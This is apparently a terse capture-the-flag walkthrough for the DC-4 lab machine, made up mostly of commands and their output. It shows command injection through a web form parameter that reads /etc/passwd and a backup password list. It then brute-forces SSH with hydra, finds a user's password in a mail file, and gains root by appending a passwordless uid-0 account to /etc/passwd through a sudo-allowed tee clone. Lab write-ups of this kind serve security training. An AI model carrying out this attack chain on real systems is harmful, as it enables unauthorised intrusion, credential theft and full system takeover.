radio=cat \/etc\/passwd &submit=Run

		You have selected: cat \/etc\/passwd <br /><pre>root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
        bin:x:2:2:bin:/bin:/usr/sbin/nologin
        sys:x:3:3:sys:/dev:/usr/sbin/nologin
        sync:x:4:65534:sync:/bin:/bin/sync
        games:x:5:60:games:/usr/games:/usr/sbin/nologin
        man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
        lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
        mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
        news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
        uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
        proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
        www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
        backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
        list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
        irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
        gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
        nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
        systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
        systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
        systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
        systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
        _apt:x:104:65534::/nonexistent:/bin/false
        messagebus:x:105:109::/var/run/dbus:/bin/false
        sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
        nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
        charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
        jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
        sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
        Debian-exim:x:108:112::/var/spool/exim4:/bin/false
        </pre>

    radio=ls+-la /home/jim/backups&submit=Run
    		You have selected: ls -la /home/jim/<br /><pre>total 32
            drwxr-xr-x 3 jim  jim  4096 Apr  7  2019 .
            drwxr-xr-x 5 root root 4096 Apr  7  2019 ..
            -rw-r--r-- 1 jim  jim   220 Apr  6  2019 .bash_logout
            -rw-r--r-- 1 jim  jim  3526 Apr  6  2019 .bashrc
            -rw-r--r-- 1 jim  jim   675 Apr  6  2019 .profile
            drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
            -rw------- 1 jim  jim   528 Apr  6  2019 mbox
            -rwsrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh
    
    radio=cat /home/jim/backups/old-passwords.bak&submit=Run
        		You have selected: cat /home/jim/backups/old-passwords.bak<br /><pre>000000
        12345
        iloveyou
        1q2w3e4r5t
        1234
        123456a
        qwertyuiop
        monkey
        123321
        dragon
        654321
        666666
        123
      ...
        love13
        fucku2
        arsenal1
        lucky7
        diablo
        apples
        george1
        babyboy1
        crystal
        1122334455
        player1
        aa123456
        vfhbyf
        forever1
        Password
        winston
        chivas1
        sexy
        hockey1
        1a2b3c4d
        pussy
        playboy1
        stalker
        cherry
        tweety
        sarah1
        qwerty123456
        123456l
        eminem1
        141414
        789789
        maria
        steelers
        iloveme1
        morgan1
        winner
        boomer
        lol
        popcorn1
        </pre>

└─$ hydra -l jim -P pas 192.168.56.133 -t 10 ssh
    [DATA] max 10 tasks per 1 server, overall 10 tasks, 252 login tries (l:1/p:252), ~26 tries per task
    [DATA] attacking ssh://192.168.56.133:22/
    [22][ssh] host: 192.168.56.133   login: jim   password: jibril04
    1 of 1 target successfully completed, 1 valid password found
//jim is not in the sudoers file

jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ 
charles@dc-4:~$ ls -la /usr/bin/teehee
-rwxr-xr-x 1 root root 38740 Apr  6  2019 /usr/bin/teehee
charles@dc-4:~$ cat /usr/bin/teehee

    Copy standard input to each FILE, and also to standard output.
    -a, --append              append to the given FILEs, do not overwrite
    -i, --ignore-interrupts   ignore interrupt signals
    -p                        diagnose errors writing to non pipes
        --output-error[=MODE]   set behavior on write error.  See MODE below
        --help     display this help and exit


harles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below

harles@dc-4:~$ echo "new1::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
new1::0:0:::/bin/bash
charles@dc-4:~$ su new1
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-4:/home/charles# cd /root
root@dc-4:/root# ls -la
total 28
drwx------  3 root root 4096 Apr  7  2019 .
drwxr-xr-x 21 root root 4096 Apr  5  2019 ..
-rw-------  1 root root   16 Apr  7  2019 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  2 root root 4096 Apr  6  2019 .nano
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
-rw-r--r--  1 root root  976 Apr  6  2019 flag.txt
root@dc-4:/root# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
